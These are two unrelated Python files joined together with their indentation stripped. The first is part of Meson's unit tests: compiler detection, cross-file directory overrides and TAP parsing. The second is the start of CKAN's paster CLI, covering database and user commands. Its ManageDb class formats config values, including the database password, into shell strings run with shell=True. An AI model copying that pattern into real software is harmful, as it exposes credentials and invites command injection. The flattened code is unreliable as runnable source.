# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
elif is_osx():
binary = 'python'
else:
binary = 'python2'
# We not have python2, check for it
for v in ['2', '2.7', '-2.7']:
rc = subprocess.call(['pkg-config', '--cflags', 'python{}'.format(v)],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc == 0:
break
else:
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', binary, entry='python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
# but we don't support that ATM so lets not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang, binary, version_str, version):
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = wrapper
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = wrapper
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functionality not directly related to
cross compiling.
This is mainly aimed to testing overrides from cross files.
"""
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser(io.StringIO(s))
return iter(parser.parse())
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, count=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, count=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, count=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool:
"""
check that Clang compiler is at least a specified version, whether AppleClang or regular Clang
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
AppleCLang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
def main():
unset_envs()
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = ['-n', 'auto', './run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
# All attempts at locating pytest failed, fall back to plain unittest.
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
raise SystemExit(main())
|
cli.py
|
# encoding: utf-8
from __future__ import print_function
import collections
import csv
import multiprocessing as mp
import os
import datetime
import sys
from pprint import pprint
import re
import itertools
import json
import logging
from optparse import OptionConflictError
import traceback
from six import text_type
from six.moves import input, xrange
from six.moves.urllib.error import HTTPError
from six.moves.urllib.parse import urljoin, urlparse
from six.moves.urllib.request import urlopen
import sqlalchemy as sa
import routes
import paste.script
from paste.registry import Registry
from paste.script.util.logging_config import fileConfig
import click
from ckan.config.middleware import make_app
import ckan.logic as logic
import ckan.model as model
import ckan.include.rjsmin as rjsmin
import ckan.include.rcssmin as rcssmin
import ckan.plugins as p
from ckan.common import config
# This is a test Flask request context to be used internally.
# Do not use it!
_cli_test_request_context = None
# NB No CKAN imports are allowed until after the config file is loaded.
# i.e. do the imports in methods, after _load_config is called.
# Otherwise loggers get disabled.
def deprecation_warning(message=None):
'''
Print a deprecation warning to STDERR.
If ``message`` is given it is also printed to STDERR.
'''
sys.stderr.write(u'WARNING: This function is deprecated.')
if message:
sys.stderr.write(u' ' + message.strip())
sys.stderr.write(u'\n')
def error(msg):
'''
Print an error message to STDOUT and exit with return code 1.
'''
sys.stderr.write(msg)
if not msg.endswith('\n'):
sys.stderr.write('\n')
sys.exit(1)
def parse_db_config(config_key='sqlalchemy.url'):
''' Takes a config key for a database connection url and parses it into
a dictionary. Expects a url like:
'postgres://tester:pass@localhost/ckantest3'
'''
from ckan.common import config
url = config[config_key]
regex = [
'^\s*(?P<db_type>\w*)',
'://',
'(?P<db_user>[^:]*)',
':?',
'(?P<db_pass>[^@]*)',
'@',
'(?P<db_host>[^/:]*)',
':?',
'(?P<db_port>[^/]*)',
'/',
'(?P<db_name>[\w.-]*)'
]
db_details_match = re.match(''.join(regex), url)
if not db_details_match:
raise Exception('Could not extract db details from url: %r' % url)
db_details = db_details_match.groupdict()
return db_details
def user_add(args):
'''Add new user if we use paster sysadmin add
or paster user add
'''
if len(args) < 1:
error('Error: you need to specify the user name.')
username = args[0]
# parse args into data_dict
data_dict = {'name': username}
for arg in args[1:]:
try:
field, value = arg.split('=', 1)
data_dict[field] = value
except ValueError:
raise ValueError(
'Could not parse arg: %r (expected "<option>=<value>)"' % arg
)
# Required
while '@' not in data_dict.get('email', ''):
data_dict['email'] = input('Email address: ').strip()
if 'password' not in data_dict:
data_dict['password'] = UserCmd.password_prompt()
# Optional
if 'fullname' in data_dict:
data_dict['fullname'] = data_dict['fullname'].decode(
sys.getfilesystemencoding()
)
print('Creating user: %r' % username)
try:
import ckan.logic as logic
import ckan.model as model
site_user = logic.get_action('get_site_user')({
'model': model,
'ignore_auth': True},
{}
)
context = {
'model': model,
'session': model.Session,
'ignore_auth': True,
'user': site_user['name'],
}
user_dict = logic.get_action('user_create')(context, data_dict)
pprint(user_dict)
except logic.ValidationError as e:
error(traceback.format_exc())
## from http://code.activestate.com/recipes/577058/ MIT licence.
## Written by Trent Mick
def query_yes_no(question, default="yes"):
"""Ask a yes/no question via input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is one of "yes" or "no".
"""
valid = {"yes": "yes", "y": "yes", "ye": "yes",
"no": "no", "n": "no"}
if default is None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while 1:
sys.stdout.write(question + prompt)
choice = input().strip().lower()
if default is not None and choice == '':
return default
elif choice in valid.keys():
return valid[choice]
else:
sys.stdout.write("Please respond with 'yes' or 'no' "
"(or 'y' or 'n').\n")
class MockTranslator(object):
def gettext(self, value):
return value
def ugettext(self, value):
return value
def ungettext(self, singular, plural, n):
if n > 1:
return plural
return singular
def _get_config(config=None):
from paste.deploy import appconfig
if config:
filename = os.path.abspath(config)
config_source = '-c parameter'
elif os.environ.get('CKAN_INI'):
filename = os.environ.get('CKAN_INI')
config_source = '$CKAN_INI'
else:
default_filename = 'development.ini'
filename = os.path.join(os.getcwd(), default_filename)
if not os.path.exists(filename):
# give really clear error message for this common situation
msg = 'ERROR: You need to specify the CKAN config (.ini) '\
'file path.'\
'\nUse the --config parameter or set environment ' \
'variable CKAN_INI or have {}\nin the current directory.' \
.format(default_filename)
exit(msg)
if not os.path.exists(filename):
msg = 'Config file not found: %s' % filename
msg += '\n(Given by: %s)' % config_source
exit(msg)
fileConfig(filename)
return appconfig('config:' + filename)
def load_config(config, load_site_user=True):
conf = _get_config(config)
assert 'ckan' not in dir() # otherwise loggers would be disabled
# We have now loaded the config. Now we can import ckan for the
# first time.
from ckan.config.environment import load_environment
load_environment(conf.global_conf, conf.local_conf)
# Set this internal test request context with the configured environment so
# it can be used when calling url_for from the CLI.
global _cli_test_request_context
app = make_app(conf.global_conf, **conf.local_conf)
flask_app = app.apps['flask_app']._wsgi_app
_cli_test_request_context = flask_app.test_request_context()
registry = Registry()
registry.prepare()
import pylons
registry.register(pylons.translator, MockTranslator())
site_user = None
if model.user_table.exists() and load_site_user:
# If the DB has already been initialized, create and register
# a pylons context object, and add the site user to it, so the
# auth works as in a normal web request
c = pylons.util.AttribSafeContextObj()
registry.register(pylons.c, c)
site_user = logic.get_action('get_site_user')({'ignore_auth': True}, {})
pylons.c.user = site_user['name']
pylons.c.userobj = model.User.get(site_user['name'])
## give routes enough information to run url_for
parsed = urlparse(conf.get('ckan.site_url', 'http://0.0.0.0'))
request_config = routes.request_config()
request_config.host = parsed.netloc + parsed.path
request_config.protocol = parsed.scheme
return site_user
def paster_click_group(summary):
'''Return a paster command click.Group for paster subcommands
:param command: the paster command linked to this function from
setup.py, used in help text (e.g. "datastore")
:param summary: summary text used in paster's help/command listings
(e.g. "Perform commands to set up the datastore")
'''
class PasterClickGroup(click.Group):
'''A click.Group that may be called like a paster command'''
def __call__(self, ignored_command):
sys.argv.remove(ignored_command)
return super(PasterClickGroup, self).__call__(
prog_name=u'paster ' + ignored_command,
help_option_names=[u'-h', u'--help'],
obj={})
@click.group(cls=PasterClickGroup)
@click.option(
'--plugin',
metavar='ckan',
help='paster plugin (when run outside ckan directory)')
@click_config_option
@click.pass_context
def cli(ctx, plugin, config):
ctx.obj['config'] = config
cli.summary = summary
cli.group_name = u'ckan'
return cli
# common definition for paster ... --config
click_config_option = click.option(
'-c',
'--config',
default=None,
metavar='CONFIG',
help=u'Config file to use (default: development.ini)')
class CkanCommand(paste.script.command.Command):
'''Base class for classes that implement CKAN paster commands to inherit.'''
parser = paste.script.command.Command.standard_parser(verbose=True)
parser.add_option('-c', '--config', dest='config',
help='Config file to use.')
parser.add_option('-f', '--file',
action='store',
dest='file_path',
help="File to dump results to (if needed)")
default_verbosity = 1
group_name = 'ckan'
def _load_config(self, load_site_user=True):
self.site_user = load_config(self.options.config, load_site_user)
class ManageDb(CkanCommand):
'''Perform various tasks on the database.
db create - alias of db upgrade
db init - create and put in default data
db clean - clears db (including dropping tables) and
search index
db upgrade [version no.] - Data migrate
db version - returns current version of data schema
db dump FILE_PATH - dump to a pg_dump file [DEPRECATED]
db load FILE_PATH - load a pg_dump from a file [DEPRECATED]
db load-only FILE_PATH - load a pg_dump from a file but don\'t do
the schema upgrade or search indexing [DEPRECATED]
db create-from-model - create database from the model (indexes not made)
db migrate-filestore - migrate all uploaded data from the 2.1 filesore.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 1
def command(self):
cmd = self.args[0]
self._load_config(cmd!='upgrade')
import ckan.model as model
import ckan.lib.search as search
if cmd == 'init':
model.repo.init_db()
if self.verbose:
print('Initialising DB: SUCCESS')
elif cmd == 'clean' or cmd == 'drop':
# remove any *.pyc version files to prevent conflicts
v_path = os.path.join(os.path.dirname(__file__),
'..', 'migration', 'versions', '*.pyc')
import glob
filelist = glob.glob(v_path)
for f in filelist:
os.remove(f)
model.repo.clean_db()
search.clear_all()
if self.verbose:
print('Cleaning DB: SUCCESS')
elif cmd == 'upgrade':
if len(self.args) > 1:
model.repo.upgrade_db(self.args[1])
else:
model.repo.upgrade_db()
elif cmd == 'version':
self.version()
elif cmd == 'dump':
self.dump()
elif cmd == 'load':
self.load()
elif cmd == 'load-only':
self.load(only_load=True)
elif cmd == 'create-from-model':
model.repo.create_db()
if self.verbose:
print('Creating DB: SUCCESS')
elif cmd == 'migrate-filestore':
self.migrate_filestore()
else:
error('Command %s not recognized' % cmd)
def _get_db_config(self):
return parse_db_config()
def _get_postgres_cmd(self, command):
self.db_details = self._get_db_config()
if self.db_details.get('db_type') not in ('postgres', 'postgresql'):
raise AssertionError('Expected postgres database - not %r' % self.db_details.get('db_type'))
pg_cmd = command
pg_cmd += ' -U %(db_user)s' % self.db_details
if self.db_details.get('db_pass') not in (None, ''):
pg_cmd = 'export PGPASSWORD=%(db_pass)s && ' % self.db_details + pg_cmd
if self.db_details.get('db_host') not in (None, ''):
pg_cmd += ' -h %(db_host)s' % self.db_details
if self.db_details.get('db_port') not in (None, ''):
pg_cmd += ' -p %(db_port)s' % self.db_details
return pg_cmd
def _get_psql_cmd(self):
psql_cmd = self._get_postgres_cmd('psql')
psql_cmd += ' -d %(db_name)s' % self.db_details
return psql_cmd
def _postgres_dump(self, filepath):
pg_dump_cmd = self._get_postgres_cmd('pg_dump')
pg_dump_cmd += ' %(db_name)s' % self.db_details
pg_dump_cmd += ' > %s' % filepath
self._run_cmd(pg_dump_cmd)
print('Dumped database to: %s' % filepath)
def _postgres_load(self, filepath):
import ckan.model as model
assert not model.repo.are_tables_created(), "Tables already found. You need to 'db clean' before a load."
pg_cmd = self._get_psql_cmd() + ' -f %s' % filepath
self._run_cmd(pg_cmd)
print('Loaded CKAN database: %s' % filepath)
def _run_cmd(self, command_line):
import subprocess
retcode = subprocess.call(command_line, shell=True)
if retcode != 0:
raise SystemError('Command exited with errorcode: %i' % retcode)
def dump(self):
deprecation_warning(u"Use PostgreSQL's pg_dump instead.")
if len(self.args) < 2:
print('Need pg_dump filepath')
return
dump_path = self.args[1]
psql_cmd = self._get_psql_cmd() + ' -f %s'
pg_cmd = self._postgres_dump(dump_path)
def load(self, only_load=False):
deprecation_warning(u"Use PostgreSQL's pg_restore instead.")
if len(self.args) < 2:
print('Need pg_dump filepath')
return
dump_path = self.args[1]
psql_cmd = self._get_psql_cmd() + ' -f %s'
pg_cmd = self._postgres_load(dump_path)
if not only_load:
print('Upgrading DB')
import ckan.model as model
model.repo.upgrade_db()
print('Rebuilding search index')
import ckan.lib.search
ckan.lib.search.rebuild()
else:
print('Now remember you have to call \'db upgrade\' and then \'search-index rebuild\'.')
print('Done')
def migrate_filestore(self):
from ckan.model import Session
import requests
from ckan.lib.uploader import ResourceUpload
results = Session.execute("select id, revision_id, url from resource "
"where resource_type = 'file.upload' "
"and (url_type <> 'upload' or url_type is null)"
"and url like '%storage%'")
for id, revision_id, url in results:
response = requests.get(url, stream=True)
if response.status_code != 200:
print("failed to fetch %s (code %s)" % (url,
response.status_code))
continue
resource_upload = ResourceUpload({'id': id})
assert resource_upload.storage_path, "no storage configured aborting"
directory = resource_upload.get_directory(id)
filepath = resource_upload.get_path(id)
try:
os.makedirs(directory)
except OSError as e:
## errno 17 is file already exists
if e.errno != 17:
raise
with open(filepath, 'wb+') as out:
for chunk in response.iter_content(1024):
if chunk:
out.write(chunk)
